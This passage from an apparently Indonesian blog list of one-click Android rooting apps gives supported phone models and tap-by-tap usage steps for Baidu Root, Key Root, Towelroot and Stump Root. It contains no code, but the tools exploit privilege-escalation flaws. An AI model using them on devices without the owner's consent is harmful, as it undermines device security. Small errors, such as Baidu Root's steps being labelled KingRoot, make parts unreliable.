  • Cek dengan aplikasi root checker untuk mengetahui apakah Android sudah berhasil di root atau gagal.  (Root checker dapat di unduh gratis di play store)
6. Baidu Root
Support 6000 lebih device Android
Cara pengunaan KingRoot:
  • Jalankan aplikasi baidu root, setujui perjanjian lisensi tap tombol sebelah kanan bawah.
  • Tap tombol biru untuk root, tunggu proses hingga selesai.
  • Cek dengan aplikasi root checker untuk mengetahui apakah Android sudah berhasil di root atau gagal.  (Root checker dapat di unduh gratis di play store)
7. Key Root
  • HP Slate 6 Voice Tab
  • Cross A27
  • Galaxy Fame
  • Evercoss A200
  • Evercoss A7b
  • Evercocc A26C
  • Galaxy Young S6310
  • Lenovo S660
  • Lenovo A1000
  • dan masih banyak lagi (silakan dicoba)
Cara pengunaan KeyRoot:
  • Jalankan aplikasi Key Root tap tombol lingkaran untuk root
  • Lalu akan terlihat permintaan instal aplikasi, aplikasi ini adalah speed booster Bisa diinstal atau dilewati dengan tekan tombol batal.
  • Proses root akan mulai. Tunggu hingga selesai. Jika berhasil akan terlinstall aplikasi baru.
  • Cek dengan aplikasi root checker untuk mengetahui apakah Android sudah berhasil di root atau gagal.  (Root checker dapat di unduh gratis di play store)
8. Towelroot
Cara pengunaan Towelroot:
  • Tap tombol make it ra1n. Bila perangkat reboot berarti root gagal.
  • Bila perangkat tidak reboot, install aplikasi supersu dari play store.
  • Cek dengan aplikasi root checker untuk mengetahui apakah Android sudah berhasil di root atau gagal.  (Root checker dapat di unduh gratis di play store)
9. Stump Root
  • LG-F400L Build/KVT49L.F400L10k
  • LG-D851 Build/KVT49L.D85110c
  • LG-D855 Build/KVT49L.A1407214586
  • LG-D855 Build/KVT49L.A1406439589
  • LG-D855 Build/KVT49L.A1407214586
  • LG-D855 Build/KVT49L.A1405331481
  • LG-D858 Build/KVT49L.D85810a
Cara pengunaan stump root:
  • Tap tombol Grind, Stump Root akan mulai proses root.
    Cek dengan aplikasi root checker untuk mengetahui apakah Android sudah berhasil di root atau gagal.  (Root checker dapat di unduh gratis di play store)
10. Asisten Root
11. 360 Root